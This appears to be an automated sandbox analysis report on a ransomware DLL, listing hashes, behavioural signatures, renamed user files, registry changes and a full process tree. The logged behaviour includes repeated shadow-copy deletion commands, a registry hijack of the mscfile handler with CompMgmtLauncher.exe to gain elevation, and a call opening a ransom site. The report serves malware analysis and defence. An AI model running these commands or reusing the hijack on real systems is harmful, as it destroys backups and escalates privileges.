5586765852943b5d8bc647bfeaebf0fb5894b5fd5839b749cb8d41068d22aebe

Analysis

max time kernel
148s
max time network
150s
platform
windows7_x64
resource
win7v20210408
submitted
29-08-2021 11:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3.dll
Size

38KB
MD5

8ca2c9564335afda47c143bf9342df82
SHA1

414b57313341832f875133db8f4e5a43059546c8
SHA256

5586765852943b5d8bc647bfeaebf0fb5894b5fd5839b749cb8d41068d22aebe
SHA512

7f210454015fcced266fae77c2da3bea740ee91800fa49b4e5f242ae854ea386758dcb29ff96538b3d424e9a4c198c067683a243bc7aae3bc06c1413b85f4e66

Score

10^/10

ransomware

Malware Config

Signatures

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exevssadmin.exevssadmin.exevssadmin.execmd.exevssadmin.exevssadmin.execmd.exevssadmin.exevssadmin.execmd.exevssadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	1560	cmd.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1420	1560	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	568	1560	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1092	1560	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	1560	cmd.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	800	1560	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1396	1560	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	1560	cmd.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	980	1560	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	512	1560	vssadmin.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	1560	cmd.exe	38
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	1560	vssadmin.exe	38

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

rundll32.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\LimitDisable.raw => C:\Users\Admin\Pictures\LimitDisable.raw.yhocbpfzn	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ResumeOptimize.crw => C:\Users\Admin\Pictures\ResumeOptimize.crw.yhocbpfzn	rundll32.exe
File opened for modification	C:\Users\Admin\Pictures\LimitTest.tiff	rundll32.exe
File renamed	C:\Users\Admin\Pictures\LimitTest.tiff => C:\Users\Admin\Pictures\LimitTest.tiff.yhocbpfzn	rundll32.exe
File renamed	C:\Users\Admin\Pictures\RepairWait.tif => C:\Users\Admin\Pictures\RepairWait.tif.yhocbpfzn	rundll32.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

rundll32.exe

description	pid	Process	procid_target
PID 1032 set thread context of 1108	1032	rundll32.exe	9
PID 1032 set thread context of 1176	1032	rundll32.exe	13
PID 1032 set thread context of 1204	1032	rundll32.exe	12

Interacts with shadow copies 2 TTPs 8 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	Process
1396	vssadmin.exe
980	vssadmin.exe
512	vssadmin.exe
1064	vssadmin.exe
1420	vssadmin.exe
568	vssadmin.exe
1092	vssadmin.exe
800	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000035aa90559ee59646b2c822c62ca11b9000000000020000000000106600000001000020000000dfb1d00dfeca0d173e143af37ebdc6a026cce14bea5f6f16405047510fcce27c000000000e8000000002000020000000db5de02e2f5144f1b17cf257784fb79282caf421d06afef2f4a34467dd7bd13f20000000ddb53f4d85500ae1246683e4a310da03392c831d07ca4c688b67c9b8641a281540000000ead81da4203a34209c7ab43dd4b66de6ca0d163e202599313e96811010715056c1bb59e949da5505c832a456b18b12fbad126dca754243163c2abbc12c092b0b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "337008888"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0111951da9cd701	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000035aa90559ee59646b2c822c62ca11b90000000000200000000001066000000010000200000004ff34639a9b91095606ae1f535c215ec4334ea579909af00347eda666a1b76c0000000000e80000000020000200000009e4234edaea50a6b2a46497916d52014d830dd251a5e30a41df5ef3d37fb4e2b90000000d99c3b137a9e23be29dd744bfe4d366809c090a9867b85a423be85438af637a4ff5e6d563a9d1afa25b9b8c411f83ecad8551e4dffd77488272fa7544ae13247b2ef9d77c8e808036efa0cb122a23b478cbc585c93e69f470fd64c93a3a2cdfbb23d2bcf67d0dcec078f1de6e10002d26059c55b589c9bfba92c14be8a58d41a4ea0a129a01688339192dcb6f0b67e5340000000bb14bc512c4debee3e1d41dd2fbfd17df14505cbe4a06a2e3e1fe3e907f6aeb64fee12472e83c80751607ed86e33327efbeeff1ab1e9e9b63e41c41e23c7bf7a	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7911EF91-08CD-11EC-9981-E6EC8A14FA92} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe

Modifies registry class 11 IoCs

Processes:

rundll32.exeDwm.exetaskhost.exeExplorer.EXE

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command	taskhost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
1100	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid	Process
1032	rundll32.exe
1032	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid	Process
1204	Explorer.EXE

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

rundll32.exe

pid	Process
1032	rundll32.exe
1032	rundll32.exe
1032	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEwmic.exeWMIC.exe

description	pid	Process
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1740	wmic.exe
Token: SeSecurityPrivilege	1740	wmic.exe
Token: SeTakeOwnershipPrivilege	1740	wmic.exe
Token: SeLoadDriverPrivilege	1740	wmic.exe
Token: SeSystemProfilePrivilege	1740	wmic.exe
Token: SeSystemtimePrivilege	1740	wmic.exe
Token: SeProfSingleProcessPrivilege	1740	wmic.exe
Token: SeIncBasePriorityPrivilege	1740	wmic.exe
Token: SeCreatePagefilePrivilege	1740	wmic.exe
Token: SeBackupPrivilege	1740	wmic.exe
Token: SeRestorePrivilege	1740	wmic.exe
Token: SeShutdownPrivilege	1740	wmic.exe
Token: SeDebugPrivilege	1740	wmic.exe
Token: SeSystemEnvironmentPrivilege	1740	wmic.exe
Token: SeRemoteShutdownPrivilege	1740	wmic.exe
Token: SeUndockPrivilege	1740	wmic.exe
Token: SeManageVolumePrivilege	1740	wmic.exe
Token: 33	1740	wmic.exe
Token: 34	1740	wmic.exe
Token: 35	1740	wmic.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1696	WMIC.exe
Token: SeSecurityPrivilege	1696	WMIC.exe
Token: SeTakeOwnershipPrivilege	1696	WMIC.exe
Token: SeLoadDriverPrivilege	1696	WMIC.exe
Token: SeSystemProfilePrivilege	1696	WMIC.exe
Token: SeSystemtimePrivilege	1696	WMIC.exe
Token: SeProfSingleProcessPrivilege	1696	WMIC.exe
Token: SeIncBasePriorityPrivilege	1696	WMIC.exe
Token: SeCreatePagefilePrivilege	1696	WMIC.exe
Token: SeBackupPrivilege	1696	WMIC.exe
Token: SeRestorePrivilege	1696	WMIC.exe
Token: SeShutdownPrivilege	1696	WMIC.exe
Token: SeDebugPrivilege	1696	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1696	WMIC.exe
Token: SeRemoteShutdownPrivilege	1696	WMIC.exe
Token: SeUndockPrivilege	1696	WMIC.exe
Token: SeManageVolumePrivilege	1696	WMIC.exe
Token: 33	1696	WMIC.exe
Token: 34	1696	WMIC.exe
Token: 35	1696	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1740	wmic.exe
Token: SeSecurityPrivilege	1740	wmic.exe
Token: SeTakeOwnershipPrivilege	1740	wmic.exe
Token: SeLoadDriverPrivilege	1740	wmic.exe
Token: SeSystemProfilePrivilege	1740	wmic.exe
Token: SeSystemtimePrivilege	1740	wmic.exe
Token: SeProfSingleProcessPrivilege	1740	wmic.exe
Token: SeIncBasePriorityPrivilege	1740	wmic.exe
Token: SeCreatePagefilePrivilege	1740	wmic.exe
Token: SeBackupPrivilege	1740	wmic.exe
Token: SeRestorePrivilege	1740	wmic.exe
Token: SeShutdownPrivilege	1740	wmic.exe
Token: SeDebugPrivilege	1740	wmic.exe
Token: SeSystemEnvironmentPrivilege	1740	wmic.exe
Token: SeRemoteShutdownPrivilege	1740	wmic.exe
Token: SeUndockPrivilege	1740	wmic.exe
Token: SeManageVolumePrivilege	1740	wmic.exe
Token: 33	1740	wmic.exe
Token: 34	1740	wmic.exe
Token: 35	1740	wmic.exe
Token: SeIncreaseQuotaPrivilege	1696	WMIC.exe
Token: SeSecurityPrivilege	1696	WMIC.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

iexplore.exeExplorer.EXE

pid	Process
1264	iexplore.exe
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE

Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid	Process
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid	Process
1264	iexplore.exe
1264	iexplore.exe
1556	IEXPLORE.EXE
1556	IEXPLORE.EXE
1556	IEXPLORE.EXE
1556	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

rundll32.execmd.execmd.exeiexplore.execmd.exeCompMgmtLauncher.exeDwm.execmd.execmd.exeCompMgmtLauncher.exetaskhost.execmd.execmd.exeCompMgmtLauncher.exeExplorer.EXE

description	pid	Process	procid_target
PID 1032 wrote to memory of 1100	1032	rundll32.exe	29
PID 1032 wrote to memory of 1100	1032	rundll32.exe	29
PID 1032 wrote to memory of 1100	1032	rundll32.exe	29
PID 1032 wrote to memory of 736	1032	rundll32.exe	30
PID 1032 wrote to memory of 736	1032	rundll32.exe	30
PID 1032 wrote to memory of 736	1032	rundll32.exe	30
PID 1032 wrote to memory of 1740	1032	rundll32.exe	31
PID 1032 wrote to memory of 1740	1032	rundll32.exe	31
PID 1032 wrote to memory of 1740	1032	rundll32.exe	31
PID 1032 wrote to memory of 432	1032	rundll32.exe	34
PID 1032 wrote to memory of 432	1032	rundll32.exe	34
PID 1032 wrote to memory of 432	1032	rundll32.exe	34
PID 432 wrote to memory of 1696	432	cmd.exe	36
PID 432 wrote to memory of 1696	432	cmd.exe	36
PID 432 wrote to memory of 1696	432	cmd.exe	36
PID 736 wrote to memory of 1264	736	cmd.exe	37
PID 736 wrote to memory of 1264	736	cmd.exe	37
PID 736 wrote to memory of 1264	736	cmd.exe	37
PID 1264 wrote to memory of 1556	1264	iexplore.exe	44
PID 1264 wrote to memory of 1556	1264	iexplore.exe	44
PID 1264 wrote to memory of 1556	1264	iexplore.exe	44
PID 1264 wrote to memory of 1556	1264	iexplore.exe	44
PID 1804 wrote to memory of 1064	1804	cmd.exe	46
PID 1804 wrote to memory of 1064	1804	cmd.exe	46
PID 1804 wrote to memory of 1064	1804	cmd.exe	46
PID 1064 wrote to memory of 700	1064	CompMgmtLauncher.exe	48
PID 1064 wrote to memory of 700	1064	CompMgmtLauncher.exe	48
PID 1064 wrote to memory of 700	1064	CompMgmtLauncher.exe	48
PID 1176 wrote to memory of 752	1176	Dwm.exe	54
PID 1176 wrote to memory of 752	1176	Dwm.exe	54
PID 1176 wrote to memory of 752	1176	Dwm.exe	54
PID 1176 wrote to memory of 568	1176	Dwm.exe	56
PID 1176 wrote to memory of 568	1176	Dwm.exe	56
PID 1176 wrote to memory of 568	1176	Dwm.exe	56
PID 568 wrote to memory of 204	568	cmd.exe	58
PID 568 wrote to memory of 204	568	cmd.exe	58
PID 568 wrote to memory of 204	568	cmd.exe	58
PID 1812 wrote to memory of 1148	1812	cmd.exe	63
PID 1812 wrote to memory of 1148	1812	cmd.exe	63
PID 1812 wrote to memory of 1148	1812	cmd.exe	63
PID 1148 wrote to memory of 1896	1148	CompMgmtLauncher.exe	64
PID 1148 wrote to memory of 1896	1148	CompMgmtLauncher.exe	64
PID 1148 wrote to memory of 1896	1148	CompMgmtLauncher.exe	64
PID 1108 wrote to memory of 900	1108	taskhost.exe	68
PID 1108 wrote to memory of 900	1108	taskhost.exe	68
PID 1108 wrote to memory of 900	1108	taskhost.exe	68
PID 1108 wrote to memory of 216	1108	taskhost.exe	69
PID 1108 wrote to memory of 216	1108	taskhost.exe	69
PID 1108 wrote to memory of 216	1108	taskhost.exe	69
PID 216 wrote to memory of 1976	216	cmd.exe	72
PID 216 wrote to memory of 1976	216	cmd.exe	72
PID 216 wrote to memory of 1976	216	cmd.exe	72
PID 1064 wrote to memory of 1580	1064	cmd.exe	77
PID 1064 wrote to memory of 1580	1064	cmd.exe	77
PID 1064 wrote to memory of 1580	1064	cmd.exe	77
PID 1580 wrote to memory of 1148	1580	CompMgmtLauncher.exe	78
PID 1580 wrote to memory of 1148	1580	CompMgmtLauncher.exe	78
PID 1580 wrote to memory of 1148	1580	CompMgmtLauncher.exe	78
PID 1204 wrote to memory of 1804	1204	Explorer.EXE	82
PID 1204 wrote to memory of 1804	1204	Explorer.EXE	82
PID 1204 wrote to memory of 1804	1204	Explorer.EXE	82
PID 1204 wrote to memory of 1384	1204	Explorer.EXE	84
PID 1204 wrote to memory of 1384	1204	Explorer.EXE	84
PID 1204 wrote to memory of 1384	1204	Explorer.EXE	84

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1108
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:900
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1976

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1204
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\3.dll,#1
  2⤵
  - Modifies extensions of user files
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1032
- - C:\Windows\system32\notepad.exe
    notepad.exe C:\Users\Public\readme.txt?
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:1100
- - C:\Windows\system32\cmd.exe
    cmd /c "start http://4234acd810784a70e6yhocbpfzn.bitslet.uno/yhocbpfzn^&1^&47764452^&92^&365^&12"?
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:736
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://4234acd810784a70e6yhocbpfzn.bitslet.uno/yhocbpfzn&1&47764452&92&365&12?
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1264
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1264 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1556
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:432
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1696
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1804
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:1384
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:220

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1176
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:752
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:568
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:204

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1804
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1064
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:700

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1420

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1972

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:568

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1092

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1812
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1148
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1896

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:800

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1396

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1064
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1580
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1148

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:980

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:512

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:1988
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:752
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1344

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1064

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\2F7AUHSE.txt

MD5
88a3ef4393a1814f153100f65692f0fd

SHA1
16b4f0b2db7d6df57c2fb3a0ed324ef7e20864e7

SHA256
28b6c1000a84f344d40f02b30213905e6248596d197a2a8d4e8f6efa544b9cd1

SHA512
5a3d783b14fa9b09cfba94787516063d94bdebaa5fe1410d4792ab337de840194af979b46b1753b2794b49263be5ef0c2b59aa798a6626b1d0fc32c7b53e60a2

Download Submit
